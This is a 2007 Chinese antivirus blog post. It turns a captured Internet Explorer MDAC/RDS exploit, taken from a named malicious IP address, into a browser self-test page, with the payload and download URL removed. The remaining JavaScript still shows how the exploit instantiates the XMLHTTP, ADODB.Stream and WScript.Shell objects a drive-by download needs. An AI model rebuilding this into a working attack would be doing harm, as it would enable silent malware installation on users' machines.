今天到 67.8.97.244 这个IP溜达去了(不加连接，免得误按)，顺手抓到了一款新的病毒，病毒的更新日期是2007.08.19，就是说如果您的杀毒软件今天没更新 , 就杀不了这些病毒。

在搜寻病毒的同时我也记录了67.8.97.244 的攻击方法，现在我又把它的攻击文件卸掉实际攻击的部分，改装成检测文件，大家不妨试试自己的浏览器，看看能不能抵抗这种攻击。

打开“记事本”，复制*号之间的内容。
保存文件名：“test.htm”，（确保在“文件夹选项”中去掉“隐藏已知文件类型的扩展名”），然后双击打开。

************************************************

<script Language='Javascript'>

//MDAC() 方法是 67.8.97.244 用来攻击浏览器的源文件，我基本没有改动。

if(MDAC()){
document.write('不安全!'); //如果MADC()运行成功，您的浏览器就是不安全的。
}else{
document.write('安全!'); //如果MADC()运行失败，证明您的浏览器可以抵受这种攻击。
}

function MDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
//这里本来有一行病毒文件的地址，删了，免得误按。

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }

//上面用来打开有漏洞的组件，下面用来打开有漏洞的服务。

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Stream");
}

if (! v[2]) {
v[2] = CreateObject(a, "Wscript.Shell");
if (! v[2]) {
v[2] = CreateObject(a, "Shell.Application");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
// 这里是实际攻击部分 已经卸掉了。
ret=1;
}

return ret;
}

function CreateObject(CLSiD, name) {
var r = null;
try { eval('r = CLSiD.CreateObject(name)') }catch(e){}
if (!r) { try {s=1; eval('r = CLSiD.CreateObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSiD.CreateObject(name, "", "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSiD.GetObject("", name)') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSiD.GetObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSiD.GetObject(name)') }catch(e){} }
return(r);
}

</script>
*************************************************
如果网页上显示 “安全” ，表明浏览器完全可以放心使用，即使遇到这种网站你也是中不了毒的。

再次提醒，在测试证明您的浏览器是安全之前，千万别到 67.8.97.244 这个IP去溜达。即使测试安全了也不要去，这个IP是个真正的流氓，它有另一段代码，会把浏览器搞到停止响应的。

其它链接：已经中毒了可以按这里

这篇文章发表于 2007年08月19日 星期日 12:00 pm，并被分类于防毒新知识。 您可以通过订阅 RSS 2.0 跟踪对这篇文章的评论。 您可以对这篇文章发表一条评论，或者在您自己的网站中引用 (Trackback) 它。